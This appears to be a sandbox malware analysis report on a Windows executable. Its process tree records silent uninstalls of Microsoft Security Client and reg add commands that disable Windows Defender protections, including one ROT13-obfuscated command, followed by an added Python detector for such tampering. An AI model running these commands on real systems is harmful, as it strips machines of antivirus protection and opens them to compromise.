Analysis

  • max time kernel
    91s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    24-11-2020 12:48

General

  • Target

    20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe

  • Size

    67KB

  • MD5

    e3bc953a18fe466cb008184a45c6c858

  • SHA1

    bcf4ffa92efac170177e5b8f9199bd8cf8c8d380

  • SHA256

    20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b

  • SHA512

    f0fd176cce8de8766f34b7d94e428173bdf83fa038611573aabb97dc78c01db3231aadd6fb1e8f0ebea1028238ded4eb8394db307f54fd9bb9eac8443936dc97

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Suspicious use of WriteProcessMemory 66 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
    "C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s
      2⤵
      PID:584
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Program Files(x86)\Microsoft Security Client\Setup.exe" /x /s
      2⤵
      PID:3412
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s
      2⤵
      PID:204
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
        PID:2392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3488
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        3⤵
        PID:940
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3⤵
        PID:184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f
        3⤵
        PID:976
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:60
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        3⤵
        PID:1676
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        PID:3808
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        3⤵
        PID:3312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f
      2⤵
      PID:2204
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        PID:1664
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:196
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        3⤵
        PID:4012
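
The tree above records thirteen child cmd.exe invocations: three runs of Microsoft Security Client\Setup.exe with /x /s (the silent-uninstall switches of Microsoft Security Essentials), nine reg add writes to Windows Defender policy and feature keys, and one command line (PID 2204) whose arguments are the same Security Client uninstall command ROT13-encoded: "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f decodes to "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s. The Python below is an added example, not sandbox output and not the sample's own code. It tokenises such command lines the way a detection pipeline would consume Sysmon Event ID 1 or Security 4688 CommandLine fields, reduces each reg add to a (key, value, data) write, matches writes against the exact Defender values this sample sets (so a default SubmitSamplesConsent=1 does not fire), recognises the uninstall, and catches ROT13-encoded arguments by decoding and re-classifying them. The DEFENDER_TAMPER table and SAMPLE_CMDLINES are taken from this report only; the one clean control line is constructed.

```python
"""Classify process command lines for Windows Defender tampering.

Added example for this report; not sandbox output and not the sample's code.
Input: cmd.exe / reg.exe command lines from the Processes tree above.
"""
import codecs
import re
from dataclasses import dataclass

# Policy values this sample writes, keyed by lower-cased key path. The data is
# the setting that weakens Defender (1 = disable, 0 = off; SubmitSamplesConsent
# 2 = never send samples). Built from this report's tree only.
DEFENDER_TAMPER = {
    r"hklm\software\policies\microsoft\windows defender": {
        "disableantispyware": 1},
    r"hklm\software\policies\microsoft\windows defender\real-time protection": {
        "disablerealtimemonitoring": 1, "disablebehaviormonitoring": 1,
        "disableonaccessprotection": 1, "disablescanonrealtimeenable": 1},
    r"hklm\software\policies\microsoft\windows defender\mpengine": {
        "mpcloudblocklevel": 0},
    r"hklm\software\policies\microsoft\windows defender\spynet": {
        "spynetreporting": 0, "submitsamplesconsent": 2},
    r"hklm\software\microsoft\windows defender\features": {
        "tamperprotection": 0},
}
# Microsoft Security Essentials installer; /x /s is its silent uninstall.
MSE_SETUP = re.compile(r"microsoft security client\\setup\.exe$", re.IGNORECASE)
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


@dataclass(frozen=True)
class RegWrite:
    key: str    # normalised: lower-case, hklm\..., no trailing backslash
    value: str  # lower-case value name
    data: str   # data exactly as passed to /d


def parse_reg_add(tokens):
    """Return the RegWrite a `reg add` invocation performs, or None."""
    for i, tok in enumerate(tokens[:-1]):
        image = tok.lower().rsplit("\\", 1)[-1]
        if image in ("reg", "reg.exe") and tokens[i + 1].lower() == "add":
            args = tokens[i + 2:]
            break
    else:
        return None
    if not args:
        return None
    key = args[0].strip().rstrip("\\").lower().replace("hkey_local_machine", "hklm")
    value, data, j = "(default)", "", 1
    while j < len(args):
        flag = args[j].lower()
        if flag in ("/v", "/t", "/d") and j + 1 < len(args):
            if flag == "/v":
                value = args[j + 1].lower()
            elif flag == "/d":
                data = args[j + 1]
            j += 2
        else:  # /f, /ve, /reg:32 ... carry no operand we need
            j += 1
    return RegWrite(key, value, data)


@dataclass(frozen=True)
class Finding:
    category: str
    detail: str


def _as_int(text):
    try:
        return int(text, 0)  # accepts "1", "0x1", "0"
    except ValueError:
        return None


def classify(cmdline, _decoded=False):
    """Return the findings for one command line; an empty list means clean."""
    findings, tokens = [], tokenize(cmdline)
    lowered = [t.lower() for t in tokens]

    write = parse_reg_add(tokens)
    if write is not None:
        expected = DEFENDER_TAMPER.get(write.key, {}).get(write.value)
        if expected is not None and _as_int(write.data) == expected:
            findings.append(Finding("defender_policy_tamper",
                                    f"{write.key}\\{write.value} = {write.data}"))

    if any(MSE_SETUP.search(t) for t in tokens) and "/x" in lowered:
        findings.append(Finding("security_client_uninstall", cmdline))

    # An argument naming no executable whose ROT13 decoding does (PID 2204
    # above). tokens[0] is the real image path and is left alone.
    rot13 = [(t, codecs.decode(t, "rot_13")) for t in tokens[1:]]
    hits = [(t, d) for t, d in rot13 if ".exe" in d.lower() and ".exe" not in t.lower()]
    for tok, dec in hits:
        findings.append(Finding("rot13_argument", f"{tok} -> {dec}"))
    if hits and not _decoded:  # classify the decoded command line once
        requoted = [tokens[0]] + [f'"{d}"' if " " in d else d for _, d in rot13]
        findings.extend(classify(" ".join(requoted), _decoded=True))
    return findings


def scan(cmdlines):
    """Map each command line to its findings, dropping clean lines."""
    report = {}
    for line in cmdlines:
        hits = classify(line)
        if hits:
            report[line] = hits
    return report


# Constructed input: five command lines copied from the process tree above plus
# one control (SubmitSamplesConsent=1 is the default, not a tamper value).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s',
    r'"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f',
    r'"C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f',
    r'"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(line)
        for h in hits:
            print(f"  [{h.category}] {h.detail}")
```

Run as a script it prints the five flagged lines with their findings; the PID 2204 line yields both a rot13_argument finding and, from the decoded command line, a security_client_uninstall finding. The value-aware match is the point of the table: alerting on any write under the Windows Defender policy key catches legitimate GPO tooling, whereas matching the specific value and data pairs this sample writes does not.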

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Modify Existing Service (T1031): 1

Defense Evasion

  • Modify Registry (T1112): 1
  • Disabling Security Tools (T1089): 1


Downloads

  • memory/60-7-0x0000000000000000-mapping.dmp
  • memory/184-13-0x0000000000000000-mapping.dmp
  • memory/196-12-0x0000000000000000-mapping.dmp
  • memory/204-2-0x0000000000000000-mapping.dmp
  • memory/584-0-0x0000000000000000-mapping.dmp
  • memory/912-11-0x0000000000000000-mapping.dmp
  • memory/940-15-0x0000000000000000-mapping.dmp
  • memory/976-16-0x0000000000000000-mapping.dmp
  • memory/1520-5-0x0000000000000000-mapping.dmp
  • memory/1664-19-0x0000000000000000-mapping.dmp
  • memory/1676-18-0x0000000000000000-mapping.dmp
  • memory/1812-9-0x0000000000000000-mapping.dmp
  • memory/2132-6-0x0000000000000000-mapping.dmp
  • memory/2204-10-0x0000000000000000-mapping.dmp
  • memory/2392-14-0x0000000000000000-mapping.dmp
  • memory/3312-21-0x0000000000000000-mapping.dmp
  • memory/3412-1-0x0000000000000000-mapping.dmp
  • memory/3488-4-0x0000000000000000-mapping.dmp
  • memory/3808-17-0x0000000000000000-mapping.dmp
  • memory/3936-8-0x0000000000000000-mapping.dmp
  • memory/4012-20-0x0000000000000000-mapping.dmp
  • memory/4080-3-0x0000000000000000-mapping.dmp